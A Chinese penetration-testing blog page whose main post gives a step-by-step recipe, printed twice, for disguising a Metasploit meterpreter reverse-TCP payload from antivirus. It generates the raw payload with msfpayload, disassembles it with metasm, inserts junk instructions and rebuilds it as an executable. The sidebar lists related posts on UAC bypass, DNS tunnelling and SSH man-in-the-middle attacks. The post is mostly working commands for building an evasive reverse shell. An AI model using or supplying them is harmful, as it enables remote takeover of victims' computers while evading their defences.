j4s0nh4ck
- 浏览: 287977 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件
1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录
cp /usr/share/metasploit-framework/lib/metasm.rb /usr/local/lib/site_ruby/1.9.1/
cp -r /usr/share/metasploit-framework/lib/metasm /usr/local/lib/site_ruby/1.9.1/
3. ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > test.asm
4.编辑花指令。关键一点,栈平衡
5. ruby /usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rb test.asm -o coolstuff.exe
1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录
cp /usr/share/metasploit-framework/lib/metasm.rb /usr/local/lib/site_ruby/1.9.1/
cp -r /usr/share/metasploit-framework/lib/metasm /usr/local/lib/site_ruby/1.9.1/
3. ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > test.asm
4.编辑花指令。关键一点,栈平衡
5. ruby /usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rb test.asm -o coolstuff.exe
分享到:
发表评论
-
kali 2.0 broadcom wifi connection
2015-12-12 16:28 444引用apt-get install -y linux-head ... -
kali2.0中国源
2015-09-27 01:42 453#中科大kali源 deb http://mirrors.us ... -
wpscan
2015-08-01 10:39 435https://www.digitalocean.com/co ... -
[转]Tunneling Data and Commands Over DNS to Bypass Firewalls
2015-07-13 20:44 482https://zeltser.com/c2-dns-tunn ... -
linux dd命令
2015-06-06 14:29 379dd if=/dev/hda of=disk.mbr coun ... -
[译]解密MSSQL密码
2015-03-26 00:43 2876原文地址: https://blog.ne ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1043参考:http://www.david-guembel.de/ ... -
Wine中使用MinGW
2015-03-17 00:49 654原文:http://null-byte.wonderhowto ... -
linux install firefix&plugin
2015-01-22 20:56 4551. download firefox&plugins ... -
gitrob--github信息收集
2015-01-17 00:36 982原文地址:http://michenriksen.com/bl ... -
合并gif和php文件
2015-01-04 23:07 8331. apt-get install gifsicle ... -
kaili 1.09安装问题解决
2014-12-28 14:10 445本人采用的安装方法是 1. 在VMware中安装1.09 Ka ... -
[译]剪切粘贴二进制文件
2014-12-17 01:20 850原文地址:http://pen-testing.sans.or ... -
kali更新exploit-db
2014-12-12 01:08 1832cd /usr/share/exploitdb wget h ... -
使用Tesseract 识别验证码
2014-12-10 00:48 795参考: http://code.google.com/p/te ... -
使用apt-fast加速Ubuntu软件安装
2014-12-02 01:21 555apt-get是Ubuntu常用的软件安装和更新命令但是它使用 ... -
the-backdoor-factory
2014-11-27 01:30 1913参考:https://github.com/secretsqu ... -
[工具]PCredz
2014-11-26 22:10 534项目地址:https://github.com/lgandx/ ... -
[译]PsExec绕过UAC
2014-11-25 01:15 1171原文地址:http://pen-testing.sans.or ... -
Kerberos 认证过程
2014-11-22 01:06 1008...
相关推荐
总的来说,Metasm 是 Ruby 开发者的一个强大工具,它提供了一个接口,使他们能够在高级语言中编写底层代码,同时保持灵活性和效率。如果你需要处理与操作系统交互、生成或解析二进制文件,或者进行逆向工程的工作,...
7. **虚拟机绕过**:许多反病毒软件使用虚拟机来执行可疑代码以检测其行为。恶意软件可以通过识别虚拟环境并改变行为以逃避检测。 8. **系统调用隐藏**:通过修改系统调用表或者使用自定义的系统调用实现,使反病毒...
该工具使用 metasm ruby gem,必须安装该 gem 才能工作。 我只在 Back Track 和 Kali linux 上测试过这个脚本。 所有未来的测试都只会在 Kali 上进行。 自定义负载选项似乎适用于任何 metasploit 负载,但它并不...
李白高力士脱靴李白贺知章告别课本剧.pptx
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
C语言项目之超级万年历系统源码,可以做课程设计参考 文章参考:https://www.qqmu.com/4373.html
Jupyter-Notebook
51单片机加减乘除计算器系统设计(proteus8.17,keil5),复制粘贴就可以运行
《中国房地产统计年鉴》面板数据资源-精心整理.zip
Jupyter-Notebook
Jupyter-Notebook
毕业论文答辩ppt,答辩ppt模板,共18套
Jupyter-Notebook
《中国城市统计年鉴》面板数据集(2004-2020年,最新).zip
Python基础 本节课知识点: • set的定义 • Set的解析 • set的操作 • set的函数
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
兵制与官制研究资料最新版.zip
Jupyter-Notebook
七普人口数据+微观数据+可视化+GIS矢量资源-精心整理.zip
Support package for Hovl Studio assets.unitypackage